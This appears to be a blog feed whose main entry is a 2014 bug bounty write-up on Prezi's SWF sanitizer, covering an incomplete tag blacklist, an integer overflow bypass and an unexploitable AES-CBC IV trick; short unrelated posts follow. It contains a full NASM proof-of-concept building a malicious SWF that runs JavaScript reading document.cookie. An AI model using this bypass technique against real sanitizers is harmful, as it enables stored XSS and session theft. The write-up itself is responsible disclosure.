Integer overflow into XSS and other fun stuff - a case study of a bug bounty

By Gynvael Coldwind | Thu, 27 Mar 2014 00:08:53 +0100 | @domain:
Some time ago I decided to spend a few evenings playing with bug bounties. I looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise that involved digging into the internals of the SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both an online service with storage and a desktop version, which is basically just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as the Prezi Bug Bounty Program goes, you can read all about it on the program's page. I'll just add that everything (communication, fixing bugs, etc.) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent execution of the user's (attacker's) code. As soon as the SWF is clean, it gets loaded into Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk-based format. Each chunk starts with a header, followed by the data; the header looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk: [ 0x3f ][ tag ID (10 bits) ][ data size (32 bits) ]
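
To make the layout above concrete, here is a minimal Python sketch of a tag header parser. It assumes the usual little-endian encoding, in which the 16-bit word holds the tag ID in its upper 10 bits and the size in its lower 6 bits, and it treats the long size as unsigned, which matches the uint handling discussed later in this post. The function name parse_tag_header is made up for this illustration.

```python
import struct

def parse_tag_header(data: bytes, pos: int = 0):
    """Return (tag_id, data_size, header_size) for the chunk header at pos."""
    (word,) = struct.unpack_from("<H", data, pos)
    tag_id = word >> 6          # upper 10 bits
    size = word & 0x3F          # lower 6 bits
    if size == 0x3F:            # 0x3f marks a long chunk: a 32-bit size follows
        (size,) = struct.unpack_from("<I", data, pos + 2)
        return tag_id, size, 6
    return tag_id, size, 2

# A short DoAction chunk (ID 12) with 5 bytes of data,
# and a long ShowFrame chunk (ID 1) declaring 1000 bytes of data.
short_header = struct.pack("<H", (12 << 6) | 5)
long_header = struct.pack("<HI", (1 << 6) | 0x3F, 1000)

print(parse_tag_header(short_header))  # (12, 5, 2)
print(parse_tag_header(long_header))   # (1, 1000, 6)
```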

Both the formats of the chunks and the tag IDs are defined in "SWF File Format Specification" released by Adobe. As of today the current version is 19 updated April 23, 2013, and as to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such a chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
{
return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
{
return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
{
return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable at that).

The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is overkill. What you want to do is remove the actions alone, and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using a blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.
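
As a rough illustration of the whitelist idea, here is a Python sketch that copies only explicitly allowed chunks and drops everything else, including tag IDs that no specification defines yet. The contents of ALLOWED_TAGS, the helper names and the decision to stop at the first malformed chunk are assumptions made for this example; this is not Prezi's code, and a real sanitizer would also have to fix the file length in the SWF headers and look inside the chunks it keeps.

```python
import struct

# Hypothetical whitelist: End, ShowFrame, DefineShape 1-4, SetBackgroundColor.
ALLOWED_TAGS = {0, 1, 2, 9, 22, 32, 83}

def filter_tags(body: bytes, allowed=ALLOWED_TAGS) -> bytes:
    """Copy only whitelisted chunks from a stream of SWF chunks."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(body):
        (word,) = struct.unpack_from("<H", body, pos)
        tag_id, size, header = word >> 6, word & 0x3F, 2
        if size == 0x3F:
            if pos + 6 > len(body):
                break                      # truncated long header
            (size,) = struct.unpack_from("<I", body, pos + 2)
            header = 6
        end = pos + header + size          # Python ints do not wrap around
        if end > len(body):
            break                          # chunk claims more data than exists
        if tag_id in allowed:
            out += body[pos:end]
        pos = end
    return bytes(out)

def short_tag(tag_id: int, data: bytes = b"") -> bytes:
    """Build a short chunk (data must be shorter than 63 bytes)."""
    return struct.pack("<H", (tag_id << 6) | len(data)) + data

body = (short_tag(1) + short_tag(12, b"\x07\x00\x00")
        + short_tag(95, b"xx") + short_tag(0))
filtered = filter_tags(body)
print(filtered == short_tag(1) + short_tag(0))  # True
```

With this approach the made-up tag 95 from the paragraph above is dropped without anyone having to update a list.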

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I noticed the following code:

private static function skipTag(param1:ByteArray) : void
{
var _loc_2:* = getTagLengthAndSkipHeader(param1);
param1.position = param1.position + _loc_2;
}// end function

The first line of the function body retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a 32-bit value, and the returned type is uint.

The second line is an addition assignment that skips past the chunk-that-is-OK in the data stream. The param1.position is also uint according to the AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.
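
The wrap-around is easy to reproduce. Python integers never overflow, so this small sketch emulates the 32-bit uint addition with a mask; the position and length values are made up for illustration.

```python
MASK32 = 0xFFFFFFFF

def uint_add(a: int, b: int) -> int:
    """Add two values the way a 32-bit unsigned type does (modulo 2**32)."""
    return (a + b) & MASK32

position = 100            # current offset in the stream
length = 0xFFFFFFF0       # attacker-supplied chunk length, i.e. -16 as a uint
print(uint_add(position, length))  # 84
```

So a "skip forward by the chunk length" ends up 16 bytes behind where it started.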

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
  if Tag at SWF.position is in blacklist {
    eraseTag(SWF)
  } else {
    skipTag(SWF)
  }
}

The skipTag was already shown above, so that leaves just the eraseTag method:

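old_position ← SWF.position
skipTag(SWF)
temp_buffer ← new ByteArray()
copy bytes from SWF.position to the end of SWF into temp_buffer
SWF.position ← old_position
write temp_buffer into SWF at SWF.position
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position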

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into the middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.
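
The effect can be reproduced with a toy model. The following Python sketch re-implements the sanitizer loop from the pseudocode above, with the uint wrap-around emulated by a mask, and runs it on a deliberately tiny chunk stream. The layout is a simplified one made up for this illustration (it is not the PoC layout and it ignores the SWF file headers), and all function names are hypothetical.

```python
import struct

MASK32 = 0xFFFFFFFF
BLACKLIST = {12, 59, 76, 82, 57, 71}

def read_header(buf, pos):
    (word,) = struct.unpack_from("<H", buf, pos)
    tag_id, size, header = word >> 6, word & 0x3F, 2
    if size == 0x3F:
        (size,) = struct.unpack_from("<I", buf, pos + 2)
        header = 6
    return tag_id, size, header

def skip_tag(buf, pos):
    _, size, header = read_header(buf, pos)
    return (pos + header + size) & MASK32    # uint addition wraps around

def sanitize(data):
    buf, pos = bytearray(data), 0
    while pos < len(buf):                    # SWF.bytesAvailable > 0
        tag_id, _, _ = read_header(buf, pos)
        if tag_id in BLACKLIST:
            end = skip_tag(buf, pos)
            buf[pos:] = buf[end:]            # eraseTag: move the tail over the tag
        else:
            pos = skip_tag(buf, pos)
    return bytes(buf)

def honest_tags(data):
    """Tag IDs as seen by a parser that does not wrap around."""
    ids, pos = [], 0
    while pos + 2 <= len(data):
        tag_id, size, header = read_header(data, pos)
        ids.append(tag_id)
        pos += header + size
    return ids

def long_tag(tag_id, size, data=b""):
    return struct.pack("<HI", (tag_id << 6) | 0x3F, size & MASK32) + data

def short_tag(tag_id, data=b""):
    return struct.pack("<H", (tag_id << 6) | len(data)) + data

hidden = short_tag(12, b"\xaa" * 6)       # blacklisted header, lands at offset 6
first = long_tag(1, len(hidden), hidden)  # ShowFrame occupying offsets 0..13
overflow = long_tag(1, 6 - 20)            # header at 14..19; 20 + size wraps to 6
evil = short_tag(12, b"\x00")             # DoAction the sanitizer never visits
swf_body = first + overflow + b"\xaa" * 2 + evil + short_tag(0)

clean = sanitize(swf_body)
print(honest_tags(swf_body))  # [1, 1]
print(honest_tags(clean))     # [1, 12, 0]
```

The sanitizer walks ShowFrame, follows the overflowing chunk back to offset 6, erases the 8-byte hidden chunk, and then reads the overflowing chunk again, which this time sends it past the end of the data. In the output, the first chunk's unchanged declared size now covers the overflowing chunk and the padding, and the DoAction chunk sits right behind it.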

Let's look at an example:

So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which describes a tag that is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just the second chunk's data) has a huge length which sends the sanitizer to EOF, and so the sanitizer exits.
  • When the Adobe Flash SWF parser sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tag's data, and ignores it (ShowFrame has no meaningful data from the SWF parser's perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed, and it's not. For some reason an incorrect size causes Flash to ignore any ActionScript (I never got to the bottom of why exactly this is happening, though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).
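
The "file size that is also a chunk header" constraint is just arithmetic on the low 16 bits of the DWORD, as this Python sketch shows. It uses the two sizes that appear in the PoC listing (830 and 766); the helper names are made up for this illustration.

```python
def as_tag_header(file_size: int):
    """Interpret the low 16 bits of the file size DWORD as a short chunk header."""
    word = file_size & 0xFFFF
    return word >> 6, word & 0x3F          # (tag ID, data size)

def candidate_sizes(tag_id: int):
    """File sizes below 64 KiB that read as a short header for tag_id.

    A data size of 0x3f would mean "long chunk", so only sizes 0..62 are listed.
    """
    return range(tag_id << 6, (tag_id << 6) | 0x3F)

print(as_tag_header(830))         # (12, 62) - DoAction, which is on the blacklist
print(as_tag_header(766))         # (11, 62) - not on the blacklist
print(max(candidate_sizes(12)))   # 830
print(830 - (2 + 62))             # 766 - size left after erasing that chunk
```

So a file of 830 bytes has a size field that the sanitizer reads as a 62-byte DoAction chunk, and erasing that chunk (2-byte header plus 62 bytes of data) leaves exactly 766 bytes.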

The final setup looked like this (in the data of the hidden chunks the sanitizer was sent to EOF of course):

The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6 ; version 6

dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
dw (%2 | %1 <<6)
%endmacro

%macro TAG_LONG 2
dw (0x3f | %1 << 6)
dd .end - ($ + 4)
%endmacro

%macro TAG_LONG_MANUAL 2
dw (0x3f | %1 << 6)
dd %2
%endmacro

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1 ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
db 0x83
dw .StringsEnd1 - ($ + 2) ; Size
db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
db '" '
; It's here. Well, send it back to the void or something.
db 0x3f ; Long tag size. (it's actually '?')
db ':' ; Tag ID. Whatever.
db ' ' ; 0x20202020 - this should be enough to get rid of it for good.
db '" + ' ; And we're done here.
; Let's continue where we left off, shall we?
db "document.cookie);", 0
db "", 0 ; _blank
.ActionsEnd: db 0 ; EndOfAction Flag

TAG_SHORT TAG_ShowFrame, 0

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so there's no sense thinking too much about it I guess; especially since it worked.

Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from * (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the previous 16-byte ciphertext block (or with the 16-byte IV in the case of the first block) and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. We know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.
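
The IV trick can be sketched in a few lines of Python. To keep the example self-contained, a toy 16-byte Feistel cipher built on hashlib stands in for AES; that substitution is an assumption of this sketch and has nothing to do with Prezi's code. The property being shown depends only on CBC mode, not on the block cipher, and all names and values below are made up for illustration.

```python
import hashlib

BLOCK = 16

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def encrypt_block(key: bytes, block: bytes) -> bytes:
    """Toy 4-round Feistel cipher standing in for AES (NOT secure)."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += xor(decrypt_block(key, block), prev)
        prev = block
    return out

def iv_for(key: bytes, ciphertext: bytes, wanted: bytes) -> bytes:
    """Pick the IV that makes the first decrypted block equal `wanted`."""
    return xor(decrypt_block(key, ciphertext[:BLOCK]), wanted)

# The "server" encrypts a file with its own key and IV.
server_key, server_iv = b"S" * 16, bytes(16)
ciphertext = cbc_encrypt(server_key, server_iv, b"FWS\x06" + b"original data..." * 3 + b"pad." * 3)

# The attacker supplies any key of their choice plus a matching IV.
attacker_key = b"attacker key 16b"
wanted = b"CWS\x0a0123456789AB"
evil_iv = iv_for(attacker_key, ciphertext, wanted)
decrypted = cbc_decrypt(attacker_key, evil_iv, ciphertext)
print(decrypted[:BLOCK] == wanted)  # True
```

Only the first 16 bytes come out as chosen; with a key that differs from the original one, every later block decrypts to bytes the attacker does not control.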

There are a couple of important things to note:
  • The IV gives us only 16-bytes to control.
  • With some AES key brute forcing it might be possible to control an additional 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of the padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroyed. This can be bypassed by choosing an IV such that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and open-source SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from a process's (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Video recording of my Data, data, data! reverse-engineering webinar

By Gynvael Coldwind | Wed, 19 Mar 2014 00:08:51 +0100 | @domain:
As you probably know, we ran into some serious technical problems during the webinar (who would suspect a Hangouts outage, huh), which caused a 40-minute delay, a change of platform and some minor problems on the line (like the lack of a recording). So, as promised, I recorded the talk again and I've just posted it on YouTube, to be enjoyed by everyone who couldn't see the live one, or decided to wait for the video for other reasons (the technical problems being a good one).

Context: please refer to this post.

"Data, data, data! I can't make bricks without clay." A few practical notes on reverse-engineering.

Direct YouTube link: click

The talk was done as part of Garage4Hackers Ranchoddas Series.

Slides: here
Scripts, etc: here

Once again sorry for the technical issues during the live talk.
Let me know what you think about the talk (questions are welcome as well) :)


C++ symbols in debian/symbols files - symbol export maps

By sil2100 | Mon, 17 Mar 2014 20:04:00 GMT | @domain:
When developing a C++ library that we later intend to provide by means of a Debian package, there are certain things that make it really complicated and hard to maintain. Everyone who has had to deal with debian/symbols in a C++ library knows how troublesome it is. The biggest problem besides name mangling: symbol leakage. By default the GNU ELF linker exports everything as it goes, leading to maintenance hell. Sadly, this has to be dealt with on the source level - the best way? Symbol export maps.

A free webinar on Reverse Engineering

By Gynvael Coldwind | Tue, 11 Mar 2014 00:08:48 +0100 | @domain:
Next week I will be doing a free webinar on Reverse Engineering - "Data, data, data! I can't make bricks without clay."*. I will focus on practical RE tips and tricks I'm using day-to-day, which generally speed up the whole process or are simply cool (imo). The webinar will be hosted by Garage4Hackers as part of the Ranchoddas Series; see the details below.

Title: "Data, data, data! I can't make bricks without clay."* A few practical notes on reverse-engineering.
* Sir Arthur Conan Doyle, The Adventure of the Copper Beeches (one of the Sherlock Holmes short stories)

Date: 17 March 2014
Time (Switzerland/EU aka UTC+01:00 aka CET aka GMT +1:00): 18:00
Time (IST aka GMT +5:30): 22:30
Duration: TBD, but something between 45-60 minutes + time for questions

Questions / chat: #g4h @ (or via web:

Registration link: click
(We will be sending out the video link via e-mail, once we have it - probably just before the webinar; we'll also post that link on G4H forum/facebook/twitter + probably around here.)

The presentation will be focused on various practical tips and tricks that can speed up the process of reverse-engineering. The presented information will not be strictly tied to any specific platform or tool - most of it can be applied on any architecture or operating system.

Examples of topics:
- how to start with an unknown architecture
- debugger scripting
- creating your own useful tools
- etc

Prerequisites:
- some reverse-engineering experience or general interest in reverse-engineering
- basic programming skills
- basic knowledge of how the CPU and operating systems work


Big thanks to Garage4Hackers Team for organizing this!

Let me know if you are planning to attend and see you there :)

My first ever podcast in English - solving Binathlon 400 CTF crackme

By Gynvael Coldwind | Mon, 17 Feb 2014 00:08:47 +0100 | @domain:
As some of you may know, I've published a little over a hundred podcasts in my native language and it seems I finally got around to try and record something in English. The podcast is about one of the solutions (and a lazy one at that) to the "HackMe" Binathlon 400 task (it was basically a ZX Spectrum crackme) from the Olympic CTF Sochi 2014 run by the MSLC.

I hope you'll enjoy the video. Feel free to ask any questions (ideally in the YouTube comments) with regards to the task that you have.

If you like the idea of me recording podcasts on security, reverse-engineering and programming related topics, let me know - I might make a habit out of it.

Node.js gamepad driver

By xa | Sat, 01 Feb 2014 22:25:00 GMT | @domain:

Node.js gamepad in action

Some time ago I wanted to play an old-school game and I wanted to use my gamepad, and of course I could not find it. The solution? Create my own gamepad, but with my limited hardware-related skills that would be a little bit difficult. The next best thing - to use a touch-capable device. But it turned out quite quickly that it would not be so easy. It’s not a problem when the HTML5 gamepad controls an HTML5 game on the same server/browser, but what about native games? A driver would be needed for that and my level of expertise in that area was the same as my level in hardware building mumbo-jumbo. My experimental “driver” had two main goals: to run on Ubuntu and to be built in Node.js.

The following post is not a tutorial, so I’m not covering the subject from top to bottom, but I’m providing a great starting point. This should give you some idea of how things work and what to expect from such a device. At the end I’m linking to a Node.js application which acts like a device driver. This app is not in any way a production-ready solution, but only an experiment, so keep in mind that there are many bugs, and that there is a high possibility that it will not run on your system (I’ve created it and tested it only on Ubuntu 13.10).

Fun with antigravity

By xa | Tue, 28 Jan 2014 22:00:00 GMT | @domain:

Some time ago, I needed a simple crowd algorithm for a project of mine. In that project there was a bunch of entities, which were moving towards a common target. Everything was alright until those entities were close to the target and each other - every entity was placed at the target at the same point. I've tried to implement some collision detection for every entity, so if one entity detected that it is colliding with another one, it would stop moving and wait for the second entity to go away. But, when there would be multiple entities in close proximity - then almost everyone would wait for everyone.

The solution for a simple, almost dumb crowd simulation was very close. Every entity, instead of stopping and waiting, should apply a reverse force which would depend on the proximity to a nearby entity. That approach is the opposite of gravity - antigravity.

The result of this algorithm can be seen above, with some presets for particle behaviors ranging from a "crowd" and "jelly" to "bacteria". Such a simple solution can create a great range of possibilities. Of course this is nowhere near a full-blown crowd simulation with advanced agent AI, but for my small project, the antigravity did a great job.
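
A minimal Python sketch of the antigravity idea described above: every entity is pulled toward the target at a constant speed and pushed away from each neighbour that is closer than some radius, with a push that grows as the distance shrinks. The linear falloff and the parameter names (speed, radius, strength) are assumptions made for this example; the post does not say which formula the original project used.

```python
import math

def step(positions, target, speed=1.0, radius=5.0, strength=2.0):
    """Advance all entities by one tick and return their new positions."""
    moved = []
    for i, (x, y) in enumerate(positions):
        # Attraction: constant-speed movement toward the common target.
        dx, dy = target[0] - x, target[1] - y
        dist = math.hypot(dx, dy)
        vx, vy = (dx / dist * speed, dy / dist * speed) if dist > 1e-9 else (0.0, 0.0)
        # Antigravity: push away from every neighbour inside the radius.
        for j, (ox, oy) in enumerate(positions):
            if i == j:
                continue
            rx, ry = x - ox, y - oy
            d = math.hypot(rx, ry)
            if 1e-9 < d < radius:
                push = strength * (1.0 - d / radius)   # stronger when closer
                vx += rx / d * push
                vy += ry / d * push
        moved.append((x + vx, y + vy))
    return moved

# Two entities approaching the same target from opposite sides.
entities = [(-10.0, 0.0), (10.0, 0.0)]
for _ in range(100):
    entities = step(entities, target=(0.0, 0.0))
separation = entities[1][0] - entities[0][0]
print(separation > 1.0)  # True
```

Instead of piling up on the target point, the two entities settle at the distance where the pull toward the target and the push from the neighbour cancel out.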

Appmenu Qt5: patches and the release candidate

By sil2100 | Tue, 14 Jan 2014 16:29:00 GMT | @domain:
Happy new year! I hope this post will be the last one in the 'Appmenu for Qt5' series. Holidays have passed and now all my required patches have been successfully merged into the upstream Qt repositories. This means that according to our current policy, we can now cherry-pick those patches to the Qt5 versions that are used in Ubuntu. Therefore, the Ubuntu Qt 5.2 packages, which are still being prepared, are already shipping my changes as quilt patches, enabling proper appmenu-qt5 support. All is ready for testing.

FFmpeg and a thousand fixes

By j00ru | Fri, 10 Jan 2014 16:44:13 +0000 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog). Following more than two years of work, the day has finally come – the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project […]

FFmpeg and a thousand fixes

By Gynvael Coldwind | Fri, 10 Jan 2014 00:08:44 +0100 | @domain:
(Collaborative post by Mateusz “j00ru” Jurczyk and Gynvael Coldwind; a short version is available at the Google Online Security blog).
Following more than two years of work, the day has finally come - the FFmpeg project has incorporated more than a thousand fixes to bugs (including some security issues) we have discovered in the project thus far:

$ git log | grep Jurczyk | grep -c Coldwind

As this event clearly marks an important day in our ongoing fuzzing effort, we decided to provide you with some background on one of the activities we are currently working on.

FFmpeg repository logs with a lot of Found-by: j00ru and Gynvael

At Google, security is a top priority -- not only for our own products, but across the entire Internet. That’s why members of the Google Security Team and other Googlers frequently perform audits of software and report the resulting findings to the respective vendors or maintainers, as shown in the official “Vulnerabilities - Application Security” list. We also try to employ the extensive computing power of our data centers in order to solve some of the security challenges by performing large-scale automated testing, commonly known as fuzzing.

Back in December 2011 we were really inspired by Tobias Klein, his "Bug Hunter's Diary" book and specifically the "NULL POINTER FTW" section discussing the discovery and exploitation process of a write-what-where condition vulnerability identified by the author in one of the FFmpeg demuxers responsible for parsing 4X Media ("4xm" in short), with its source code residing in the "libavformat/4xm.c" source file. The security flaw was not difficult to find through manual analysis, since the affected code was contained within several continuous lines of text; while it was just a single example of a trivial programming error, it got us thinking. After all, if there was a simple vulnerability in a C module of less than 400 lines of code performing a relatively simple task, chances were there could have been more similar or less obvious problems in the entire FFmpeg codebase, currently at about 832,000 lines of code (and definitely with more than 0.5MLOC back at the time).

While reading about the 4xm demuxer vulnerability, we thought that we could help FFmpeg eliminate many potential low-hanging problems from the code by making use of the Google fleet and fuzzing infrastructure we already had in place. There were also several other reasons why we decided that taking the project as a fuzzing target would be a good idea:
  • FFmpeg had a history of reliability and security issues prior to Tobias' discovery, see FFmpeg Security website.
  • Feeding input to the software and triggering relevant code paths was as trivial as using the standalone ffmpeg executable with appropriate command line options.
  • The project was strictly about parsing complex, often proprietary file format structures in native C code - essentially, a paradise for any bug hunter. There were lots of dynamic allocations, arithmetic operations, indexing buffers based on input data, moving memory around and other operations known to be frequently prone to various types of programming mistakes. As a bonus, different parsing modules were developed by different contributors, typically with varying security awareness.
  • Input data was readily available - the internet was full of audio/video files in a variety of formats and encoded with different codecs. There were also dedicated corpuses of files designed to be used for media decoder testing. Two examples of such data sets are and the FFmpeg FATE project.
